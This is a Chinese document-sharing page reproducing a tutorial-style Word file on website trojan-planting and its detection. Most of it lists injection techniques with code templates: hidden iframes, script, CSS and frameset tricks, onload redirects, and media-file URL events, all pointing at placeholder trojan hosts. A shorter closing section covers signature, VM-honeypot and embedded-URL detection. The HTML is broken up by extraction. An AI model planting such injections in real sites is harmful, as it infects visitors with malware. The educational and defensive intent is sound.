网站挂马及检测技术Word文件下载.docx
《网站挂马及检测技术Word文件下载.docx》由会员分享,可在线阅读,更多相关《网站挂马及检测技术Word文件下载.docx(6页珍藏版)》请在冰豆网上搜索。
网络应用越普及,黑色产业链的从业者收益也就越高。
挂马范围
哪些网站容易被挂马呢?
越是流量高的网站对黑客越有吸引力,黑客攻破一个管理上有漏洞并且网站流量很高的网站,一天就可以感染数百万人。
那些与公共事业密切相关的网站,比如政府机关的网站,色情网站,视频网站,聊天交友网站,提供盗版软件破解工具的网站最容易被入侵,几乎每周出现的热点网络事件都被攻击者利用,网民一不小心就会受热门事件吸引中招。
这段代码就显得更加隐蔽,因为几乎95%的网页中都会出现类似的script标签。
利用js引入网页木马也有多种方法:
在js中直接写出框架网页木马
示例代码如下:
document.write("
<
iframewidth='
0'
height='
src='
网页木马地址'
>
/iframe>
"
);
指定language的属性为"
JScript.Encode"
还可以引入其他扩展名的js代码,这样就更加具有迷惑性,示例代码如下:
SCRIPTlanguage="
src=http:
//www.
利用js更改body的innerHTML属性,引入网页木马
如果对内容进行编码的话,不但能绕过杀毒软件的检测,而且增加了解密的难度,示例代码如下:
op.document.body.innerHTML=top.document.body.innerHTML+'
\r\n
iframesrc="
http:
//网页木马地址/%22%3E%3C/iframe%3E'
;
利用JavaScript的window.open方法打开一个不可见的新窗口
SCRIPTlanguage=javascript>
window.open("
网页木马地址"
"
toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1"
);
<
/script>
利用URL欺骗
ahref="
(/迷惑用户的链接地址,显示这个地址指向木马地址)"
onMouseOver="
www_163_com();
returntrue;
页面要显示的正常内容<
/a>
:
SCRIPTLanguage="
JavaScript"
functionwww_163_com()
{
varurl="
;
open(url,"
NewWindow"
toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"
}
/SCRIPT>
3.body挂马
使用如下代码,就可以使网页在加载完成的时候跳转到网页木马的网址
bodyonload="
window.location='
/body>
。
4.css中挂马
利用层叠样式表CSS引入js,从而引入网页木马,示例代码如下:
body{background-image:
url('
javascript:
scriptsrc=http:
//www.XXX.net/muma.js>
)'
)}
这种方式比较难发现。
5.图片伪装
随着防毒技术的发展,黑客手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似:
html>
height=0width=0>
imgsrc="
/html>
注:
当用户打开
6.利用隐藏的分割框架引入网页木马
framesetrows="
444,0"
cols="
*"
framesrc="
打开网页"
framborder="
no"
scrolling="
auto"
noresizemarginwidth="
0"
margingheight="
网马地址"
frameborder="
/frameset>
7.在swf中挂马
网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。
在网页中插入swf的语法一般格式为:
OBJECT
classid=clsid:
D27CDB6E-AE6D-11cf-96B8-444553540000codebase=WIDTH=760NAME=qualityVALUE=high>
EMBED
src=
quality=highpluginspage=
type=application/x-shockwave-flashwidth=760height=60>
/EMBED>
/OBJECT>
8.在影音文件中挂马
所需工具是RealMediaEditor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或RMVB为扩展名的文件。
接着,新建一个文本,在里面输入u00:
00:
10:
000:
30.0&
&
_rpexternal&
;
(00:
10.0就是发生第一事件的时间,这里是让计算机弹出网页;
30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;
而后面的URL地址就是连接指定的木马地址。
)
输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。
当合并完成后,依次选择“文本”-“Real文件另存为”,保存好即可。
最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。
9.通过钓鱼网站挂马
黑客伪造网站,并在钓鱼网站上插入恶意代码下载木马。
10.ARP挂马
并不需要真正攻陷目标网站:
知名网站通常防护严密。
ARP欺骗:
对同一以太网网段中,通过ARP欺骗方法进行中间人攻击,
可劫持指定网络流量并进行任意修改
ARP欺骗挂马:
在Web请求反馈页面中插入iframe等重定向链接代码,从
而使得目标网站被“虚拟”挂马
网站挂马的检测方式
1.特征匹配
文本文件型病毒的特征码是从它的代码中提取一处或多处此病毒特有的字符串作为病毒文件的特征,只要这些字符串稍有变化,病毒的特征也就变化了,则必须增加病毒的特征记录。
例如,eval(“\151\146”),这段javascript代码提取病毒特征码的办法是提取eval或\151\146作为特征标识,当eval函数中代码发生1次变化时,特征病毒库就要增加l条特征记录,这往往会导致病毒库过大,并且一旦病毒进行了变形,将无法用特征库检测出来。
2.虚拟机检测
采用虚拟机的方法,在虚拟机中安装真实的操作系统,使用IE浏览器浏览网页,进行网页行为检测,根据监控到的系统动态行为判定客户端蜜罐系统是否被攻击并植入木马,从而确定网页是否被挂马。
3.检测网页内嵌的url
通过对网页内嵌的url进行判断,看是否为脚本或可执行文件。
如果是,则很有可能是木马。
网页可标记为可疑可以网页。
有的网页代码是经过加密的,所以要对加密混淆的恶意网页进行识别和解密。
然后对解密后网页代码进行特征匹配,从而检测出网页木马。
显然此处的核心问题就是解密,常见解密方法如下:
●根据已知编码/加密方法,构建相应的解码/解密程序
●浏览器动态执行解密技术
●基于Javascipt/VBScript等脚本语言解析引擎进行动态执行,从而对加密脚本进行解密
升级会员 